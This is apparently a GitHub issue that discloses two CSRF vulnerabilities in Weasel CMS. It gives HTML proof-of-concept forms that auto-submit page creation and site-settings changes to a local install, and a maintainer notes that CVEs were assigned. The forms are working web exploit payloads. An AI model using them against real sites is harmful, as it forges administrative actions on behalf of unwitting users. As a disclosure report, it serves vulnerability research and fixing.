There are two CSRF vulnerabilities that can create new pages or update the website settings
Cgaiide opened this issue · comments
- There is a CSRF vulnerability that can create new pages via index.php?b=pages&a=new
- poc:
one.html---create a new page
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/weasel-cms/index.php" method="POST">
<input type="hidden" name="page-action" value="create" />
<input type="hidden" name="page-title" value="newpage" />
<input type="hidden" name="page-content" value="newpagenewpagenewpage" />
<input type="hidden" name="page-date" value="2018-08-03" />
<input type="hidden" name="page-time" value="11:54" />
<input type="hidden" name="page-slug" value="newpage" />
<input type="hidden" name="page-tags" value="newpage" />
<input type="hidden" name="page-description" value="newpage" />
<input type="hidden" name="page-active" value="on" />
<input type="hidden" name="page-submit" value="Create New Page" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2.There is a CSRF vulnerability that can update the website settings via index.php
- poc:
two.html---update the website settings
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/weasel-cms/index.php" method="POST">
<input type="hidden" name="site-language" value="en" />
<input type="hidden" name="site-title" value="newsettings" />
<input type="hidden" name="site-description" value="newsettings" />
<input type="hidden" name="site-keywords" value="newsettings" />
<input type="hidden" name="site-theme" value="weasel-dark" />
<input type="hidden" name="settings-submit" value="Save Settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Good catch @SkyZhang47 ! thanks for reporting this again
CVE-2018-14958 and CVE-2018-14959 has been assigned for this.